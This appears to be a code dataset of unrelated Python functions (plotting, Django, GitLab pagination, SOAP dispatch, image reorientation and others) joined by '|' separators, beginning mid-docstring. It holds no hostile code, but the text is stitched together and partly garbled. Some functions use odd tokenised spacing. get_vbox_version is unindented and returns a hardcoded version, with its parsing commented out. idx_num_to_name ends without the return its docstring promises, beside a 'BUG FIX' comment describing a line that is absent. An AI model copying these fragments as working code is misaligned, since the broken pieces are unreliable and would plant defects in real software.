        Does nothing if `sparkline=False`.
    :param color: The color of the filled columns. Default is `(0.25, 0.25, 0.25)`.
    :param inline: If True, ``plt.show()`` the figure instead of returning the axis.
    :param freq: Optional frequency string; when given (and the index is a PeriodIndex or
        DatetimeIndex), timestamp ticks at that frequency are drawn on the y axis.
    :return: If `inline` is False, the underlying matplotlib axis object. Else, nothing.
    """
    df = nullity_filter(df, filter=filter, n=n, p=p)
    df = nullity_sort(df, sort=sort)
    height = df.shape[0]
    width = df.shape[1]
    # z is the color-mask array, g is a NxNx3 matrix. Apply the z color-mask to set the RGB of each pixel.
    z = df.notnull().values
    g = np.zeros((height, width, 3))
    g[z < 0.5] = [1, 1, 1]
    g[z > 0.5] = color
    # Set up the matplotlib grid layout. A unary subplot if no sparkline, a left-right splot if yes sparkline.
    plt.figure(figsize=figsize)
    if sparkline:
        gs = gridspec.GridSpec(1, 2, width_ratios=width_ratios)
        gs.update(wspace=0.08)
        ax1 = plt.subplot(gs[1])
    else:
        gs = gridspec.GridSpec(1, 1)
    ax0 = plt.subplot(gs[0])
    # Create the nullity plot.
    ax0.imshow(g, interpolation='none')
    # Remove extraneous default visual elements.
    ax0.set_aspect('auto')
    ax0.grid(b=False)
    ax0.xaxis.tick_top()
    ax0.xaxis.set_ticks_position('none')
    ax0.yaxis.set_ticks_position('none')
    ax0.spines['top'].set_visible(False)
    ax0.spines['right'].set_visible(False)
    ax0.spines['bottom'].set_visible(False)
    ax0.spines['left'].set_visible(False)
    # Set up and rotate the column ticks. The labels argument is set to None by default. If the user specifies it in
    # the argument, respect that specification. Otherwise display for <= 50 columns and do not display for > 50.
    if labels or (labels is None and len(df.columns) <= 50):
        ha = 'left'
        ax0.set_xticks(list(range(0, width)))
        ax0.set_xticklabels(list(df.columns), rotation=45, ha=ha, fontsize=fontsize)
    else:
        ax0.set_xticks([])
    # Adds Timestamps ticks if freq is not None, else set up the two top-bottom row ticks.
    if freq:
        ts_list = []
        # isinstance() replaces the original `type(...) ==` comparisons.
        if isinstance(df.index, pd.PeriodIndex):
            ts_array = pd.date_range(df.index.to_timestamp().date[0], df.index.to_timestamp().date[-1],
                                     freq=freq).values
            ts_ticks = pd.date_range(df.index.to_timestamp().date[0], df.index.to_timestamp().date[-1],
                                     freq=freq).map(lambda t: t.strftime('%Y-%m-%d'))
        elif isinstance(df.index, pd.DatetimeIndex):
            ts_array = pd.date_range(df.index.date[0], df.index.date[-1], freq=freq).values
            ts_ticks = pd.date_range(df.index.date[0], df.index.date[-1],
                                     freq=freq).map(lambda t: t.strftime('%Y-%m-%d'))
        else:
            raise KeyError('Dataframe index must be PeriodIndex or DatetimeIndex.')
        try:
            for value in ts_array:
                ts_list.append(df.index.get_loc(value))
        except KeyError:
            raise KeyError('Could not divide time index into desired frequency.')
        ax0.set_yticks(ts_list)
        ax0.set_yticklabels(ts_ticks, fontsize=int(fontsize / 16 * 20), rotation=0)
    else:
        ax0.set_yticks([0, df.shape[0] - 1])
        ax0.set_yticklabels([1, df.shape[0]], fontsize=int(fontsize / 16 * 20), rotation=0)
    # Create the inter-column vertical grid.  (The original reused the name
    # `in_between_point` for both the list and the loop variable.)
    in_between_points = [x + 0.5 for x in range(0, width - 1)]
    for in_between_point in in_between_points:
        ax0.axvline(in_between_point, linestyle='-', color='white')
    if sparkline:
        # Calculate row-wise completeness for the sparkline.
        completeness_srs = df.notnull().astype(bool).sum(axis=1)
        x_domain = list(range(0, height))
        y_range = list(reversed(completeness_srs.values))
        min_completeness = min(y_range)
        max_completeness = max(y_range)
        min_completeness_index = y_range.index(min_completeness)
        max_completeness_index = y_range.index(max_completeness)
        # Set up the sparkline, remove the border element.
        ax1.grid(b=False)
        ax1.set_aspect('auto')
        # GH 25: matplotlib 2.x renamed set_axis_bgcolor to set_facecolor.
        if int(mpl.__version__[0]) <= 1:
            ax1.set_axis_bgcolor((1, 1, 1))
        else:
            ax1.set_facecolor((1, 1, 1))
        ax1.spines['top'].set_visible(False)
        ax1.spines['right'].set_visible(False)
        ax1.spines['bottom'].set_visible(False)
        ax1.spines['left'].set_visible(False)
        ax1.set_ymargin(0)
        # Plot sparkline --- plot is sideways so the x and y axis are reversed.
        ax1.plot(y_range, x_domain, color=color)
        if labels:
            # Figure out what case to display the label in: mixed, upper, lower.
            label = 'Data Completeness'
            if str(df.columns[0]).islower():
                label = label.lower()
            if str(df.columns[0]).isupper():
                label = label.upper()
            # Set up and rotate the sparkline label.
            ha = 'left'
            ax1.set_xticks([min_completeness + (max_completeness - min_completeness) / 2])
            ax1.set_xticklabels([label], rotation=45, ha=ha, fontsize=fontsize)
            ax1.xaxis.tick_top()
            ax1.set_yticks([])
        else:
            ax1.set_xticks([])
            ax1.set_yticks([])
        # Add maximum and minimum labels, circles.
        ax1.annotate(max_completeness, xy=(max_completeness, max_completeness_index),
                     xytext=(max_completeness + 2, max_completeness_index),
                     fontsize=int(fontsize / 16 * 14), va='center', ha='left')
        ax1.annotate(min_completeness, xy=(min_completeness, min_completeness_index),
                     xytext=(min_completeness - 2, min_completeness_index),
                     fontsize=int(fontsize / 16 * 14), va='center', ha='right')
        # Widen the limits, otherwise the circles are cut off.
        ax1.set_xlim([min_completeness - 2, max_completeness + 2])
        ax1.plot([min_completeness], [min_completeness_index], '.', color=color, markersize=10.0)
        ax1.plot([max_completeness], [max_completeness_index], '.', color=color, markersize=10.0)
        # Remove tick mark (only works after plotting).
        ax1.xaxis.set_ticks_position('none')
    if inline:
        plt.show()
    else:
        return ax0
|
def getContactItems(self, person):
    """Return a C{list} of the L{Notes} items associated with the given
    person.  If none exist, create an empty one, wrap it in a list and
    return that.

    @type person: L{Person}
    """
    existing = list(person.store.query(Notes, Notes.person == person))
    if existing:
        return existing
    # No notes yet: create a fresh empty Notes item for this person.
    return [Notes(store=person.store, person=person, notes=u'')]
|
def patched_get_current(self, request=None):
    """Monkey patched version of Django's SiteManager.get_current() function.

    Returns the current Site based on a given request or the SITE_ID in
    the project's settings.  When a request is given, first try to match a
    site whose domain equals ``request.get_host()``; if that fails (or no
    request was given), fall back to the site identified by the configured
    SITE_ID setting.
    """
    # Imported here to avoid circular import
    from django.conf import settings
    if request:
        # pylint: disable=protected-access
        try:
            return self._get_site_by_request(request)
        except Site.DoesNotExist:
            pass
    site_id = getattr(settings, 'SITE_ID', '')
    if site_id:
        # pylint: disable=protected-access
        return self._get_site_by_id(site_id)
    raise ImproperlyConfigured(
        "You're using the Django \"sites framework\" without having "
        "set the SITE_ID setting. Create a site in your database and "
        "set the SITE_ID setting or pass a request to "
        "Site.objects.get_current() to fix this error.")
|
def _update_data_dict(self, data_dict, back_or_front):
    """Annotate ``data_dict`` in place: record whether it describes a
    backend or a frontend, and derive ``spct`` (the percentage of used
    sessions) from ``scur``/``slim`` when both are present."""
    data_dict['back_or_front'] = back_or_front
    if 'slim' not in data_dict or 'scur' not in data_dict:
        return
    try:
        data_dict['spct'] = (data_dict['scur'] / data_dict['slim']) * 100
    except (TypeError, ZeroDivisionError):
        # 'slim' may be None or zero; leave 'spct' unset in that case.
        pass
|
def getall(fn, page=None, *args, **kwargs):
    """Auto-iterate over the paginated results of various methods of the API.

    Pass the GitLabAPI method as the first argument, followed by the other
    parameters as normal.  Include `page` to determine the first page to
    poll.  Remaining kwargs are passed on to the called method, including
    `per_page`.

    :param fn: Actual method to call
    :param page: Optional, page number to start at, defaults to 1
    :param args: Positional arguments to actual method
    :param kwargs: Keyword arguments to actual method
    :return: Yields each item in the result until exhausted; or no
        elements if error
    """
    current = page if page else 1
    while True:
        batch = fn(*args, page=current, **kwargs)
        # An empty (or falsy) page means we've run off the end.
        if not batch:
            break
        for item in batch:
            yield item
        current += 1
|
def _posix_split_name(self, name):
    """Split a name longer than 100 chars into a prefix and a name part."""
    cut = name[:LENGTH_PREFIX + 1]
    # Trim back to the last '/' so the split lands on a path boundary.
    while cut and not cut.endswith("/"):
        cut = cut[:-1]
    remainder = name[len(cut):]
    cut = cut[:-1]  # drop the trailing '/'
    if not cut or len(remainder) > LENGTH_NAME:
        raise ValueError("name is too long")
    return cut, remainder
|
def unparse_color(r, g, b, a, type):
    """Take the r, g, b, a color values and give back a css color string
    of the given ``type``.  This is the inverse function of parse_color."""
    # The 3/4-digit shorthand is only usable when every channel is a
    # multiple of 17 (i.e. no precision would be lost).
    lossless_short = not (r % 17 or g % 17 or b % 17)
    if type == '#rgb':
        if lossless_short:
            return '#%x%x%x' % (int(r / 17), int(g / 17), int(b / 17))
        type = '#rrggbb'  # would lose precision, fall back to the long form
    elif type == '#rgba':
        if lossless_short:
            return '#%x%x%x%x' % (int(r / 17), int(g / 17), int(b / 17), int(a * 15))
        type = '#rrggbbaa'
    if type == '#rrggbb':
        return '#%02x%02x%02x' % (r, g, b)
    elif type == '#rrggbbaa':
        return '#%02x%02x%02x%02x' % (r, g, b, int(a * 255))
    elif type == 'rgb':
        return 'rgb(%d, %d, %d)' % (r, g, b)
    elif type == 'rgba':
        return 'rgba(%d, %d, %d, %g)' % (r, g, b, a)
|
def minify_js_files():
    """Minify the configured js files with UglifyJS."""
    # Only the mapping values are needed; the keys are ignored.
    for mapping in JS_FILE_MAPPING.values():
        sources = " ".join(mapping["input_files"])
        target = mapping["output_file"]
        local("uglifyjs {input_files} -o {output_file}".format(
            input_files=sources, output_file=target))
|
def to_json(self):
    """Return a `dict` representation of the resource, including all
    properties and tags.

    Returns:
        `dict`
    """
    res = self.resource
    # Property names are camel-cased for the JSON representation.
    properties = {to_camelcase(prop.name): prop.value for prop in res.properties}
    tags = [{'key': tag.key, 'value': tag.value} for tag in res.tags]
    return {
        'resourceType': res.resource_type_id,
        'resourceId': self.id,
        'accountId': res.account_id,
        'account': self.account,
        'location': res.location,
        'properties': properties,
        'tags': tags,
    }
|
def parse_argv():
    """Parse command line arguments.

    Settings are stored in the global ``CONFIG`` dict, the logger verbosity
    is adjusted, and the set of songs to process is built from (in priority
    order) ``--from-file``, ``--recursive``, the positional arguments, or
    the currently playing song.

    :return: set of Song objects (Nones from failed constructors removed)
    """
    parser = argparse.ArgumentParser(description='Find lyrics for a set of mp3'
                                     ' files and embed them as metadata')
    parser.add_argument('-j', '--jobs', help='Number of parallel processes',
                        type=int, metavar='N', default=1)
    parser.add_argument('-o', '--overwrite', help='Overwrite lyrics of songs'
                        ' that already have them', action='store_true')
    parser.add_argument('-s', '--stats', help='Print a series of statistics at'
                        ' the end of the execution', action='store_true')
    parser.add_argument('-v', '--verbose', help='Set verbosity level (pass it'
                        ' up to three times)', action='count')
    parser.add_argument('-d', '--debug', help='Enable debug output',
                        action='store_true')
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-r', '--recursive', help='Recursively search for'
                       ' mp3 files', metavar='path', nargs='?', const='.')
    group.add_argument('--from-file', help='Read a list of files from a text'
                       ' file', type=str)
    parser.add_argument('songs', help='The files/songs to search lyrics for',
                        nargs='*')
    args = parser.parse_args()
    CONFIG['overwrite'] = args.overwrite
    CONFIG['print_stats'] = args.stats
    # Map the -v count to a logger level: none -> CRITICAL, 1 -> INFO, 2+ -> DEBUG.
    if args.verbose is None or args.verbose == 0:
        logger.setLevel(logging.CRITICAL)
    elif args.verbose == 1:
        logger.setLevel(logging.INFO)
    else:
        logger.setLevel(logging.DEBUG)
    if args.jobs <= 0:
        msg = 'Argument -j/--jobs should have a value greater than zero'
        parser.error(msg)
    else:
        CONFIG['jobcount'] = args.jobs
    songs = set()
    if args.from_file:
        songs = load_from_file(args.from_file)
        if not songs:
            raise ValueError('No file names found in file')
    elif args.recursive:
        mp3files = glob.iglob(args.recursive + '/**/*.mp3', recursive=True)
        songs = set(Song.from_filename(f) for f in mp3files)
    elif args.songs:
        # NOTE: the original rebound ``parser`` here, shadowing the argparse
        # parser; use a dedicated name for the Song constructor instead.
        if os.path.exists(args.songs[0]):
            song_factory = Song.from_filename
        else:
            song_factory = Song.from_string
        songs.update(map(song_factory, args.songs))
    else:
        songs.add(get_current_song())
    # Just in case some song constructors failed, remove all the Nones
    return songs.difference({None})
|
def getid(self, ref):
    """Obtain the reference number of the vgroup following the vgroup
    with the given reference number.

    Args::
        ref    reference number of the vgroup after which to search;
               set to -1 to start the search at the start of
               the HDF file

    Returns::
        reference number of the vgroup past the one identified by 'ref'

    An exception is raised if the end of the vgroup is reached.

    C library equivalent : Vgetid
    """
    next_ref = _C.Vgetid(self._hdf_inst._id, ref)
    # A negative result signals bad arguments or end of iteration.
    _checkErr('getid', next_ref, "bad arguments or last vgroup reached")
    return next_ref
|
def get_trace_id():
    """Helper to get trace_id from web application request header.

    :rtype: str
    :returns: TraceID in HTTP request headers, or None if no framework
        checker produced one.
    """
    # Try each framework-specific extractor in turn; first hit wins.
    for checker in (get_trace_id_from_django,
                    get_trace_id_from_flask,
                    get_trace_id_from_webapp2):
        found = checker()
        if found is not None:
            return found
    return None
|
def power(base, exp):
    """Element-wise exponentiation with broadcasting.

    Equivalent to ``base ** exp`` and ``mx.nd.broadcast_power(lhs, rhs)``.

    .. note::
       If the corresponding dimensions of two arrays have the same size or
       one of them has size 1, then the arrays are broadcastable to a
       common shape.

    Parameters
    ----------
    base : scalar or NDArray
        The base array
    exp : scalar or NDArray
        The exponent array. If ``base.shape != exp.shape``, they must be
        broadcastable to a common shape.

    Returns
    -------
    NDArray
        The bases raised to the exponents, element-wise.

    Examples
    --------
    >>> x = mx.nd.ones((2,3))*2
    >>> y = mx.nd.arange(1,3).reshape((2,1))
    >>> mx.nd.power(x, y).asnumpy()
    array([[ 2.,  2.,  2.],
           [ 4.,  4.,  4.]], dtype=float32)
    """
    # pylint: disable=no-member, protected-access
    # _ufunc_helper dispatches on the operand types:
    #   NDArray ** NDArray, scalar ** scalar,
    #   NDArray ** scalar, scalar ** NDArray, respectively.
    return _ufunc_helper(
        base,
        exp,
        op.broadcast_power,
        operator.pow,
        _internal._power_scalar,
        _internal._rpower_scalar)
|
def parse_friends ( self , friends_page ) :
    """Parse the MAL user friends page DOM and return user friends attributes.

    :type friends_page: :class:`bs4.BeautifulSoup`
    :param friends_page: MAL user friends page's DOM
    :rtype: dict
    :return: Sidebar user attributes extended with a ``friends`` dict that
        maps friend user objects to per-friend info (``last_active`` and
        ``since`` dates, when present on the page).
    """
    # Base attributes come from the shared sidebar parser.
    user_info = self . parse_sidebar ( friends_page )
    # Second <td> of the content table holds the friend blocks.
    second_col = friends_page . find ( u'div' , { u'id' : u'content' } ) . find ( u'table' ) . find ( u'tr' ) . find_all ( u'td' , recursive = False ) [ 1 ]
    try :
        user_info [ u'friends' ] = { }
        friends = second_col . find_all ( u'div' , { u'class' : u'friendHolder' } )
        if friends :
            for row in friends :
                # Each friendBlock's <div>s: avatar, name link, then
                # (optionally) last-active and friends-since columns.
                block = row . find ( u'div' , { u'class' : u'friendBlock' } )
                cols = block . find_all ( u'div' )
                friend_link = cols [ 1 ] . find ( u'a' )
                friend = self . session . user ( friend_link . text )
                friend_info = { }
                if len ( cols ) > 2 and cols [ 2 ] . text != u'' :
                    friend_info [ u'last_active' ] = utilities . parse_profile_date ( cols [ 2 ] . text . strip ( ) )
                if len ( cols ) > 3 and cols [ 3 ] . text != u'' :
                    friend_info [ u'since' ] = utilities . parse_profile_date ( cols [ 3 ] . text . replace ( u'Friends since' , '' ) . strip ( ) )
                user_info [ u'friends' ] [ friend ] = friend_info
    except :
        # Bare except is deliberate: parse errors are swallowed unless the
        # session opts in to re-raising them.
        if not self . session . suppress_parse_exceptions :
            raise
    return user_info
|
def find_additional_rels(self, all_models):
    """Attempts to scan for additional relationship fields for this model
    based on all of the other models' structures and relationships.

    :param all_models: mapping of model name -> model for every known model
    """
    for model_name, model in iteritems(all_models):
        if model_name == self.name:
            continue  # a model cannot contribute a reverse rel to itself
        for field_name in model.field_names:
            field = model.fields[field_name]
            # Only FK/M2M fields that reference this model *and* declare a
            # reverse name contribute an additional relationship.
            # (A tuple isinstance() replaces the original chained checks.)
            if (field.field_type == self.name and field.back_populates is not None and
                    isinstance(field, (StatikForeignKeyField, StatikManyToManyField))):
                self.additional_rels[field.back_populates] = {
                    'to_model': model_name,
                    'back_populates': field_name,
                    # M2M relations need the association (secondary) table.
                    'secondary': (model_name, field.field_type)
                    if isinstance(field, StatikManyToManyField) else None,
                }
                logger.debug('Additional relationship %s.%s -> %s (%s)',
                             self.name, field.back_populates, model_name,
                             self.additional_rels[field.back_populates])
def get_hypo_location ( self , mesh_spacing , hypo_loc = None ) :
    """The method determines the location of the hypocentre within the rupture.

    The rupture mesh is taken from ``self.mesh``; when ``hypo_loc`` is None
    the mesh centroid is returned.

    :param mesh_spacing:
        The desired distance between two adjacent points in source's
        ruptures' mesh, in km. Mainly this parameter allows to balance
        the trade-off between time needed to compute the distance
        between the rupture surface and a site and the precision of that
        computation.
    :param hypo_loc:
        Hypocentre location as fraction of rupture plane, as a tuple of
        (Along Strike, Down Dip), e.g. a hypocentre located in the centroid
        of the rupture would be input as (0.5, 0.5), whereas a
        hypocentre located in a position 3/4 along the length, and 1/4 of
        the way down dip of the rupture plane would be entered as
        (0.75, 0.25).
    :returns:
        Hypocentre location as instance of
        :class:`~openquake.hazardlib.geo.point.Point`
    """
    mesh = self . mesh
    centroid = mesh . get_middle_point ( )
    if hypo_loc is None :
        return centroid
    # Down-dip: convert the fractional position into the nearest mesh row.
    total_len_y = ( len ( mesh . depths ) - 1 ) * mesh_spacing
    y_distance = hypo_loc [ 1 ] * total_len_y
    y_node = int ( numpy . round ( y_distance / mesh_spacing ) )
    # Along-strike: same conversion within the selected row.
    total_len_x = ( len ( mesh . lons [ y_node ] ) - 1 ) * mesh_spacing
    x_distance = hypo_loc [ 0 ] * total_len_x
    x_node = int ( numpy . round ( x_distance / mesh_spacing ) )
    hypocentre = Point ( mesh . lons [ y_node ] [ x_node ] , mesh . lats [ y_node ] [ x_node ] , mesh . depths [ y_node ] [ x_node ] )
    return hypocentre
|
def unparse(self, dn, record):
    """Write an entry or change record to the output file.

    :type dn: string
    :param dn: distinguished name
    :type record: Union[Dict[string, List[string]], List[Tuple]]
    :param record: Either a dictionary holding an entry or a list of
        additions (2-tuple) or modifications (3-tuple).
    """
    self._unparse_attr('dn', dn)
    # Dict -> entry record, list -> change record; anything else is an error.
    if isinstance(record, dict):
        writer = self._unparse_entry_record
    elif isinstance(record, list):
        writer = self._unparse_change_record
    else:
        raise ValueError("Argument record must be dictionary or list")
    writer(record)
    # A blank separator line terminates the record.
    self._output_file.write(self._line_sep)
    self.records_written += 1
|
def open_and_reorient_image(handle):
    """Load the image from the specified file and orient the image
    according to the Exif tag that the file might embed, which would
    indicate the orientation of the camera relative to the captured scene.

    @param handle: a Python file object.

    @return: an instance returned by the Python Library Image library.
    """
    # Retrieve tags from the Exchangeable image file format (Exif)
    # included in the picture.  If the orientation of the picture is not
    # top left side, rotate it accordingly.
    exif_tags = exifread.process_file(handle)
    exif_tag_orientation = exif_tags.get(EXIF_TAG_ORIENTATION)
    # Orientation values 3/6/8 map to 180/270/90 degree rotations.  Plain
    # int keys replace the Python 2-only long literals (3L/6L/8L); they
    # compare equal under Python 2 and are valid on Python 3 too.
    rotation_angle = exif_tag_orientation and {3: 180, 6: 270, 8: 90}.get(exif_tag_orientation.values[0])
    # exifread.process_file has updated the file's current position.
    handle.seek(0)
    image = Image.open(handle)
    return image if rotation_angle is None else image.rotate(rotation_angle)
|
def copy(self):
    """Returns a new copy of a C{ParseResults} object."""
    # Build a fresh instance over the same token list, then duplicate the
    # bookkeeping attributes one by one (tokdict is shallow-copied).
    duplicate = ParseResults(self.__toklist)
    duplicate.__name = self.__name
    duplicate.__parent = self.__parent
    duplicate.__tokdict = self.__tokdict.copy()
    duplicate.__accumNames.update(self.__accumNames)
    return duplicate
|
def _Dispatch ( ps , server , SendResponse , SendFault , post , action , nsdict = { } , ** kw ) :
    '''Send ParsedSoap instance to ServiceContainer, which dispatches to
    appropriate service via post, and method via action.  Response is a
    self-describing pyobj, which is passed to a SoapWriter.
    Call SendResponse or SendFault to send the reply back, appropriately.

    ps -- ParsedSoap instance (the incoming request)
    server -- ServiceContainer instance
    SendResponse / SendFault -- callbacks used to emit the reply
    post -- HTTP POST path identifying the target service
    action -- SOAP action selecting the operation
    '''
    localURL = 'http://%s:%d%s' % ( server . server_name , server . server_port , post )
    address = action
    service = server . getNode ( post )
    isWSResource = False
    # WS-Addressing resources carry their routing data in SOAP headers:
    # parse it and validate against the transport-level SOAPAction.
    if isinstance ( service , WSAResource ) :
        isWSResource = True
        service . setServiceURL ( localURL )
        address = Address ( )
        try :
            address . parse ( ps )
        except Exception , e :
            return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
        if action and action != address . getAction ( ) :
            e = WSActionException ( 'SOAP Action("%s") must match WS-Action("%s") if specified.' % ( action , address . getAction ( ) ) )
            return SendFault ( FaultFromException ( e , 0 , None ) , ** kw )
        action = address . getAction ( )
    if isinstance ( service , ServiceInterface ) is False :
        e = NoSuchService ( 'no service at POST(%s) in container: %s' % ( post , server ) )
        return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
    if not service . authorize ( None , post , action ) :
        return SendFault ( Fault ( Fault . Server , "Not authorized" ) , code = 401 )
    # try :
    #     raise NotAuthorized ( )
    # except Exception , e :
    #     return SendFault ( FaultFromException ( e , 0 , None ) , code = 401 , ** kw )
    ## return SendFault ( FaultFromException ( NotAuthorized ( ) , 0 , None ) , code = 401 , ** kw )
    # Resolve the operation, then invoke it (WS resources also receive the
    # parsed Address).  Any failure is turned into a SOAP fault.
    try :
        method = service . getOperation ( ps , address )
    except Exception , e :
        return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
    try :
        if isWSResource is True :
            request , result = method ( ps , address )
        else :
            request , result = method ( ps )
    except Exception , e :
        return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
    # Verify if Signed
    service . verify ( ps )
    # If No response just return .
    if result is None :
        return SendResponse ( '' , ** kw )
    # Serialize the response pyobj; WS resources also get WS-Addressing
    # headers attached to the reply before signing.
    sw = SoapWriter ( nsdict = nsdict )
    try :
        sw . serialize ( result )
    except Exception , e :
        return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
    if isWSResource is True :
        action = service . getResponseAction ( ps , action )
        addressRsp = Address ( action = action )
        try :
            addressRsp . setResponseFromWSAddress ( address , localURL )
            addressRsp . serialize ( sw )
        except Exception , e :
            return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
    # Create Signatures
    service . sign ( sw )
    try :
        soapdata = str ( sw )
        return SendResponse ( soapdata , ** kw )
    except Exception , e :
        return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
|
def generator(name):
    """Return generator by its name.

    :param name: name of hash-generator (case-insensitive)
    :return: WHashGeneratorProto class
    :raises ValueError: if no generator is registered under ``name``
    """
    name = name.upper()
    # Membership test directly on the dict; ``in d.keys()`` was redundant.
    if name not in WHash.__hash_map__:
        raise ValueError('Hash generator "%s" not available' % name)
    return WHash.__hash_map__[name]
|
def _get_action(self, action_meta):
    '''Parse action and turn into a calling point.

    :param action_meta: single-key mapping {function_name: metadata}
    :return: tuple of (info text, output spec, call configuration)
    '''
    fun = list(action_meta.keys())[0]
    conf = {'fun': fun, 'arg': [], 'kwargs': {}}
    # A function name without a module prefix marks an internal function.
    if '.' not in fun:
        conf['salt.int.intfunc'] = True
    meta = action_meta[fun]
    info = meta.get('info', 'Action for {}'.format(fun))
    for arg in meta.get('args') or []:
        # Plain values become positional args; dicts contribute kwargs.
        if isinstance(arg, dict):
            conf['kwargs'].update(arg)
        else:
            conf['arg'].append(arg)
    return info, meta.get('output'), conf
|
def AQLQuery(self, query, batchSize=100, rawResults=False, bindVars={}, options={},
             count=False, fullCount=False, json_encoder=None, **moreArgs):
    """Run an AQL query against this database.

    Set ``rawResults=True`` if you want the query to return dictionnaries
    instead of Document objects.  You can use ``**moreArgs`` to pass more
    arguments supported by the api, such as ``ttl=60`` (time to live).
    """
    # Delegate to the module-level AQLQuery class, forwarding every option.
    return AQLQuery(
        self,
        query,
        rawResults=rawResults,
        batchSize=batchSize,
        bindVars=bindVars,
        options=options,
        count=count,
        fullCount=fullCount,
        json_encoder=json_encoder,
        **moreArgs)
|
def set_reference(self, ref):
    """Set the reference sequence.

    :param ref: reference sequence
    :type ref: string
    """
    # _options is namedtuple-style (immutable): swap in a copy carrying
    # the new reference rather than mutating in place.
    updated = self._options._replace(reference=ref)
    self._options = updated
|
def get_vbox_version ( config_kmk ) :
"Return the vbox config major , minor , build"
|
with open ( config_kmk , 'rb' ) as f :
config = f . read ( )
major = b"6"
# re . search ( b " VBOX _ VERSION _ MAJOR = ( ? P < major > [ \ d ] ) " , config ) . groupdict ( ) [ ' major ' ]
minor = b"0"
# re . search ( b " VBOX _ VERSION _ MINOR = ( ? P < minor > [ \ d ] ) " , config ) . groupdict ( ) [ ' minor ' ]
build = b"4"
# re . search ( b " VBOX _ VERSION _ BUILD = ( ? P < build > [ \ d ] ) " , config ) . groupdict ( ) [ ' build ' ]
return b"." . join ( [ major , minor , build ] )
|
def export(self, name, columns, points):
    """Write the points to the CouchDB server."""
    logger.debug("Export {} stats to CouchDB".format(name))
    # Build the document: stat values keyed by column name, tagged with the
    # stat name and a JSON-encoded timestamp.
    document = dict(zip(columns, points))
    document['type'] = name
    document['time'] = couchdb.mapping.DateTimeField()._to_json(datetime.now())
    # Write the document to the CouchDB database.
    # Result can be viewed at: http://127.0.0.1:5984/_utils
    try:
        self.client[self.db].save(document)
    except Exception as e:
        logger.error("Cannot export {} stats to CouchDB ({})".format(name, e))
|
def __log(self, method_name):
    """Logs the deprecation message on first call, does nothing after.

    :param method_name: Name of the deprecated method
    """
    if self.__already_logged:
        # Already reported once; stay silent from now on.
        return
    call_stack = "\n\t".join(traceback.format_stack())
    logging.getLogger(self.__logger).warning(
        "%s: %s\n%s", method_name, self.__message, call_stack)
    self.__already_logged = True
|
def plot_violin(data, var_names=None, quartiles=True, credible_interval=0.94, shade=0.35, bw=4.5, sharey=True, figsize=None, textsize=None, ax=None, kwargs_shade=None, ):
    """Plot posterior of traces as violin plot.

    Notes
    -----
    If multiple chains are provided for a variable they will be combined.

    Parameters
    ----------
    data : obj
        Any object that can be converted to an az.InferenceData object.
        Refer to documentation of az.convert_to_dataset for details.
    var_names : list, optional
        List of variables to plot (defaults to None, which results in all
        variables plotted).
    quartiles : bool, optional
        Flag for plotting the interquartile range, in addition to the
        credible_interval*100% intervals. Defaults to True.
    credible_interval : float, optional
        Credible intervals. Defaults to 0.94.
    shade : float
        Alpha blending value for the shaded area under the curve, between 0
        (no shade) and 1 (opaque). Defaults to 0.35.
    bw : float
        Bandwidth scaling factor. Should be larger than 0. The higher this
        number the smoother the KDE will be. Defaults to 4.5 which is
        essentially the same as the Scott's rule of thumb (the default rule
        used by SciPy).
    figsize : tuple
        Figure size. If None it will be defined automatically.
    textsize : int
        Text size of the point_estimates, axis ticks, and HPD. If None it
        will be autoscaled based on figsize.
    sharey : bool
        Defaults to True, violinplots share a common y-axis scale.
    ax : matplotlib axes
    kwargs_shade : dicts, optional
        Additional keywords passed to `fill_between`, or `barh` to control
        the shade.

    Returns
    -------
    ax : matplotlib axes
    """
    data = convert_to_dataset(data, group="posterior")
    var_names = _var_names(var_names, data)
    # One plotter per variable; chains are combined into a single sample.
    plotters = list(xarray_var_iter(data, var_names=var_names, combined=True))
    if kwargs_shade is None:
        kwargs_shade = {}
    # Scale figure/font sizes to the number of violins.
    (figsize, ax_labelsize, _, xt_labelsize, linewidth, _) = _scale_fig_size(figsize, textsize, 1, len(plotters))
    ax_labelsize *= 2
    if ax is None:
        fig, ax = plt.subplots(1, len(plotters), figsize=figsize, sharey=sharey, constrained_layout=True)
    else:
        fig = ax.figure
    ax = np.atleast_1d(ax)
    for axind, (var_name, selection, x) in enumerate(plotters):
        val = x.flatten()
        # Integer-valued samples get a categorical histogram; continuous
        # samples get a KDE-based violin.
        if val[0].dtype.kind == "i":
            cat_hist(val, shade, ax[axind], **kwargs_shade)
        else:
            _violinplot(val, shade, bw, ax[axind], **kwargs_shade)
        # per = [25th, 75th, 50th] percentiles; per[-1] is the median.
        per = np.percentile(val, [25, 75, 50])
        hpd_intervals = hpd(val, credible_interval)
        if quartiles:
            # Thick bar: interquartile range.
            ax[axind].plot([0, 0], per[:2], lw=linewidth * 3, color="k", solid_capstyle="round")
        # Thin bar: HPD interval; white dot: median.
        ax[axind].plot([0, 0], hpd_intervals, lw=linewidth, color="k", solid_capstyle="round")
        ax[axind].plot(0, per[-1], "wo", ms=linewidth * 1.5)
        ax[axind].set_xlabel(make_label(var_name, selection), fontsize=ax_labelsize)
        ax[axind].set_xticks([])
        ax[axind].tick_params(labelsize=xt_labelsize)
        ax[axind].grid(None, axis="x")
    if sharey:
        fig.subplots_adjust(wspace=0)
    else:
        fig.tight_layout()
    return ax
|
def idx_num_to_name(L):
    """Switch from index-by-number to index-by-name.

    Re-indexes the ``paleoData`` and ``chronData`` sections (when present)
    via ``_import_data``. Errors are logged and printed; the (possibly
    partially converted) metadata is always returned.

    :param dict L: Metadata
    :return dict L: Metadata
    """
    logger_jsons.info("enter idx_num_to_name")
    try:
        if "paleoData" in L:
            L["paleoData"] = _import_data(L["paleoData"], "paleo")
        if "chronData" in L:
            L["chronData"] = _import_data(L["chronData"], "chron")
    except Exception as e:
        logger_jsons.error("idx_num_to_name: {}".format(e))
        # BUG FIX: the console message previously named the inverse
        # function (idx_name_to_num), which made errors misleading.
